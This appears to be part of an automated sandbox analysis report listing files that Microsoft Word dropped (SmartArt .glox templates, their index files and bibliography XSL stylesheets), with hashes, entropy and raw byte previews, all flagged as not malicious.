                            SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                            SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):264
                            Entropy (8bit):3.4866056878458096
                            Encrypted:false
                            SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                            MD5:6C489D45F3B56845E68BE07EA804C698
                            SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                            SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                            SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):6448
                            Entropy (8bit):7.897260397307811
                            Encrypted:false
                            SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                            MD5:42A840DC06727E42D42C352703EC72AA
                            SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                            SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                            SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                            Malicious:false
                            Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):3.4670546921349774
                            Encrypted:false
                            SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                            MD5:3D52060B74D7D448DC733FFE5B92CB52
                            SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                            SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                            SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):5630
                            Entropy (8bit):7.87271654296772
                            Encrypted:false
                            SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                            MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                            SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                            SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                            SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                            Malicious:false
                            Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):238
                            Entropy (8bit):3.472155835869843
                            Encrypted:false
                            SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                            MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                            SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                            SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                            SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):5151
                            Entropy (8bit):7.859615916913808
                            Encrypted:false
                            SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                            MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                            SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                            SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                            SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                            Malicious:false
                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):252
                            Entropy (8bit):3.48087342759872
                            Encrypted:false
                            SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                            MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                            SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                            SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                            SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):4326
                            Entropy (8bit):7.821066198539098
                            Encrypted:false
                            SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                            MD5:D32E93F7782B21785424AE2BEA62B387
                            SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                            SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                            SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                            Malicious:false
                            Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):252
                            Entropy (8bit):3.4680595384446202
                            Encrypted:false
                            SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                            MD5:D79B5DE6D93AC06005761D88783B3EE6
                            SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                            SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                            SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):5783
                            Entropy (8bit):7.88616857639663
                            Encrypted:false
                            SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                            MD5:8109B3C170E6C2C114164B8947F88AA1
                            SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                            SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                            SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                            Malicious:false
                            Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):302
                            Entropy (8bit):3.537169234443227
                            Encrypted:false
                            SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                            MD5:9C00979164E78E3B890E56BE2DF00666
                            SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                            SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                            SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):217137
                            Entropy (8bit):5.068335381017074
                            Encrypted:false
                            SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                            MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                            SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                            SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                            SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):254
                            Entropy (8bit):3.4721586910685547
                            Encrypted:false
                            SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                            MD5:4DD225E2A305B50AF39084CE568B8110
                            SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                            SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                            SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):4243
                            Entropy (8bit):7.824383764848892
                            Encrypted:false
                            SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                            MD5:7BC0A35807CD69C37A949BBD51880FF5
                            SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                            SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                            SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                            Malicious:false
                            Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):292
                            Entropy (8bit):3.5026803317779778
                            Encrypted:false
                            SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                            MD5:A0D51783BFEE86F3AC46A810404B6796
                            SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                            SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                            SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):251032
                            Entropy (8bit):5.102652100491927
                            Encrypted:false
                            SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                            MD5:F425D8C274A8571B625EE66A8CE60287
                            SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                            SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                            SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):254
                            Entropy (8bit):3.4845992218379616
                            Encrypted:false
                            SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                            MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                            SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                            SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                            SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):6024
                            Entropy (8bit):7.886254023824049
                            Encrypted:false
                            SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                            MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                            SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                            SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                            SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                            Malicious:false
